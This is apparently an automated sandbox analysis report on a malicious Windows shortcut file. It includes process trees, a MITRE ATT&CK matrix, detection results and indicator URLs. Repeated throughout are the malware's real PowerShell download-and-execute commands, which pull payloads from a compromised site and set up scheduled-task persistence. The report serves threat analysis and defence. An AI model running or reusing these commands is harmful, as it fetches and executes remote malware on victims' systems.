      Source: powershell.exe, 00000019.00000002.2459821550.000001E4E6D80000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllPP
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Yara detected Powershell download and execute
      Source: Yara matchFile source: amsi64_6652.amsi.csv, type: OTHER
      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6652, type: MEMORYSTR
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\user~1\AppData\Local\Temp\epZTzlYAtsWrS0.js epZTzlYAtsWrS0.js " /tn e0OvtdEL8Jump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\NDU462JA8L5M.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn epZTzlYAtsWrS0.js /f; wscript $env:programdata\NDU462JA8L5M.js "Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /delete /tn epZTzlYAtsWrS0.js /fJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" C:\ProgramData\NDU462JA8L5M.jsJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\NDU462JA8L5M.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn epZTzlYAtsWrS0.js /f; wscript $env:programdata\NDU462JA8L5M.js "
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /delete /tn epZTzlYAtsWrS0.js /f
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" C:\ProgramData\NDU462JA8L5M.js
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\NDU462JA8L5M.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn epZTzlYAtsWrS0.js /f; wscript $env:programdata\NDU462JA8L5M.js "
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /delete /tn epZTzlYAtsWrS0.js /f
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" C:\ProgramData\NDU462JA8L5M.js
      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -comman [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; $kxian4cb6eh1v = new-object net.webclient; $cio = $kxian4cb6eh1v.downloaddata('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicutsqo.php'); $kxian4cb6eh1v.downloadfile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxh2dz.php', 'epztzlyatswrs0.js'); schtasks /create /sc minute /mo 1 /f /tr ([system.text.encoding]::utf8.getstring($cio) + $env:tmp + '\' + ('epztzlyatswrs0.js ' * 2)) /tn e0ovtdel8;
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "iwr -outfi $env:programdata\ndu462ja8l5m.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretpf.php'; schtasks /delete /tn epztzlyatswrs0.js /f; wscript $env:programdata\ndu462ja8l5m.js "
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "iwr -outfi $env:programdata\ndu462ja8l5m.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretpf.php'; schtasks /delete /tn epztzlyatswrs0.js /f; wscript $env:programdata\ndu462ja8l5m.js "
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "iwr -outfi $env:programdata\ndu462ja8l5m.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretpf.php'; schtasks /delete /tn epztzlyatswrs0.js /f; wscript $env:programdata\ndu462ja8l5m.js "
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "iwr -outfi $env:programdata\ndu462ja8l5m.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretpf.php'; schtasks /delete /tn epztzlyatswrs0.js /f; wscript $env:programdata\ndu462ja8l5m.js "Jump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "iwr -outfi $env:programdata\ndu462ja8l5m.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretpf.php'; schtasks /delete /tn epztzlyatswrs0.js /f; wscript $env:programdata\ndu462ja8l5m.js "
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "iwr -outfi $env:programdata\ndu462ja8l5m.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretpf.php'; schtasks /delete /tn epztzlyatswrs0.js /f; wscript $env:programdata\ndu462ja8l5m.js "
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity Information21
      Scripting      		Valid Accounts1
      Command and Scripting Interpreter      		1
      Scheduled Task/Job      		11
      Process Injection      		21
      Virtualization/Sandbox Evasion      		OS Credential Dumping11
      Security Software Discovery      		Remote Services1
      Archive Collected Data      		11
      Encrypted Channel      		Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault Accounts1
      Scheduled Task/Job      		21
      Scripting      		1
      Scheduled Task/Job      		11
      Process Injection      		LSASS Memory11
      Process Discovery      		Remote Desktop ProtocolData from Removable Media1
      Ingress Tool Transfer      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain Accounts1
      Exploitation for Client Execution      		1
      DLL Side-Loading      		1
      DLL Side-Loading      		1
      Obfuscated Files or Information      		Security Account Manager21
      Virtualization/Sandbox Evasion      		SMB/Windows Admin SharesData from Network Shared Drive2
      Non-Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal Accounts2
      PowerShell      		Login HookLogin Hook1
      DLL Side-Loading      		NTDS1
      Application Window Discovery      		Distributed Component Object ModelInput Capture13
      Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
      File and Directory Discovery      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials12
      System Information Discovery      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1567191 Sample: yT6gJFN0SR.lnk Startdate: 03/12/2024 Architecture: WINDOWS Score: 100 47 www.italialife24.it 2->47 49 italialife24.it 2->49 53 Malicious sample detected (through community Yara rule) 2->53 55 Windows shortcut file (LNK) starts blacklisted processes 2->55 57 Multi AV Scanner detection for submitted file 2->57 59 12 other signatures 2->59 8 wscript.exe 1 1 2->8         started        11 wscript.exe 2->11         started        13 wscript.exe 2->13         started        15 powershell.exe 14 20 2->15         started        signatures3 process4 dnsIp5 61 Windows shortcut file (LNK) starts blacklisted processes 8->61 63 Suspicious powershell command line found 8->63 65 Wscript starts Powershell (via cmd or directly) 8->65 69 2 other signatures 8->69 18 powershell.exe 16 8->18         started        20 powershell.exe 11->20         started        22 powershell.exe 13->22         started        51 italialife24.it 46.254.34.201, 443, 49699, 49700 SERVERPLAN-ASIT Italy 15->51 67 Uses schtasks.exe or at.exe to add and modify task schedules 15->67 24 conhost.exe 1 15->24         started        26 schtasks.exe 1 15->26         started        signatures6 process7 process8 28 wscript.exe 18->28         started        31 conhost.exe 18->31         started        33 schtasks.exe 1 18->33         started        35 conhost.exe 20->35         started        37 schtasks.exe 1 20->37         started        39 wscript.exe 20->39         started        41 conhost.exe 22->41         started        43 schtasks.exe 1 22->43         started        45 wscript.exe 22->45         started        signatures9 71 Windows Scripting host queries suspicious COM object (likely to drop second stage) 28->71

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      yT6gJFN0SR.lnk46%ReversingLabsShortcut.Trojan.Pantera
      yT6gJFN0SR.lnk100%Joe Sandbox ML

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      https://www.italialife24.it0%Avira URL Cloudsafe
      https://www.italialife24.it/wp-content/uploads/2021/05/untrippingv0%Avira URL Cloudsafe
      https://www.italialife24.it/wp-content/uploads/2021/05/untrippingvT.ps10%Avira URL Cloudsafe
      https://www.italialife24.it/wp-content0%Avira URL Cloudsafe
      https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php0%Avira URL Cloudsafe
      https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php0%Avira URL Cloudsafe
      https://go.micros0%Avira URL Cloudsafe
      https://www.italialife24.it/wp-content/uploads/2021/05/a0%Avira URL Cloudsafe
      https://www.italialife24.it/wp-content/uploads/2021/05/au0%Avira URL Cloudsafe
      https://www.italialife24.it/wp-content/uploads/2021/05/stepPCj5H.php0%Avira URL Cloudsafe
      https://www.italialife24.it/wp-c0%Avira URL Cloudsafe
      http://www.italialife24.it0%Avira URL Cloudsafe
      http://italialife24.it0%Avira URL Cloudsafe
      https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      italialife24.it
      		46.254.34.201
      		truetrue
        		unknown
        www.italialife24.it
        		unknown
        		unknowntrue
          		unknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.phptrue
          • Avira URL Cloud: safe
          		unknown
          https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.phptrue
          • Avira URL Cloud: safe
          		unknown
          https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.phptrue
          • Avira URL Cloud: safe
          		unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          https://www.italialife24.itpowershell.exe, 00000000.00000002.1355313472.00000207AD6C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1355313472.00000207AD662000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1392811582.0000022851D90000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1729657654.00000178C434B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2320094225.000001E4CFDB1000.00000004.00000800.00020000.00000000.sdmptrue
          • Avira URL Cloud: safe
          		unknown
          http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.1355313472.00000207AD952000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1370494305.00000207BC1E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1370494305.00000207BC0A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1392811582.0000022852324000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1447891640.0000022860ACF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1447891640.0000022860C05000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1825343985.00000178D33A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1825343985.00000178D325E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1729657654.00000178C4AD5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2442772033.000001E4DEAE3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2442772033.000001E4DEC19000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2320094225.000001E4D0349000.00000004.00000800.00020000.00000000.sdmpfalse
            		high
            http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000000.00000002.1355313472.00000207AD785000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1392811582.0000022852096000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1729657654.00000178C4836000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2320094225.000001E4D00B8000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              https://www.italialife24.it/wp-content/uploads/2021/05/auwscript.exe, 00000018.00000002.2279989400.000001D168195000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000019.00000002.2320094225.000001E4D02C3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2320094225.000001E4D00B8000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000019.00000002.2320094225.000001E4D02C3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2320094225.000001E4D00B8000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://www.italialife24.it/wp-content/uploads/2021/05/stepPCj5H.phpwscript.exe, 0000001C.00000002.2338052164.000001F1B4090000.00000004.00000020.00020000.00000000.sdmp, NDU462JA8L5M.js.12.drfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://go.micropowershell.exe, 00000000.00000002.1355313472.00000207ACC62000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1392811582.000002285167C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1729657654.00000178C434B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2320094225.000001E4CF69C000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://contoso.com/Licensepowershell.exe, 00000019.00000002.2320094225.000001E4D0349000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://contoso.com/Iconpowershell.exe, 00000019.00000002.2320094225.000001E4D0349000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://github.com/Pester/Pesterpowershell.exe, 00000019.00000002.2320094225.000001E4D02C3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2320094225.000001E4D00B8000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://www.italialife24.it/wp-content/uploads/2021/05/triazoicutsqo.phppowershell.exe, 00000000.00000002.1354882040.00000207AA335000.00000004.00000020.00020000.00000000.sdmpfalse
                            		unknown
                            https://www.italialife24.it/wp-content/uploads/2021/05/untrippingvwscript.exe, 0000000F.00000002.1413160775.000001FB698A5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000015.00000002.1746599548.000001B9565C5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001C.00000002.2338001423.000001F1B24B5000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://go.microspowershell.exe, 0000000C.00000002.1457580508.0000022868EE9000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://contoso.com/powershell.exe, 00000019.00000002.2320094225.000001E4D0349000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.1355313472.00000207AD952000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1370494305.00000207BC1E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1370494305.00000207BC0A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1392811582.0000022852324000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1447891640.0000022860ACF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1447891640.0000022860C05000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1825343985.00000178D33A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1825343985.00000178D325E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1729657654.00000178C4AD5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2442772033.000001E4DEAE3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2442772033.000001E4DEC19000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2320094225.000001E4D0349000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://oneget.orgXpowershell.exe, 00000000.00000002.1355313472.00000207AD785000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1392811582.0000022852096000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1729657654.00000178C4836000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2320094225.000001E4D00B8000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://www.italialife24.it/wp-content/uploads/2021/05/afretpf.phppowershell.exe, 0000000C.00000002.1457478884.0000022868D60000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1834579083.00000178DB210000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2314205529.000001E4CCA05000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		unknown
                                    https://www.italialife24.it/wp-contentwscript.exe, wscript.exe, 00000018.00000002.2279989400.000001D168195000.00000004.00000020.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: safe
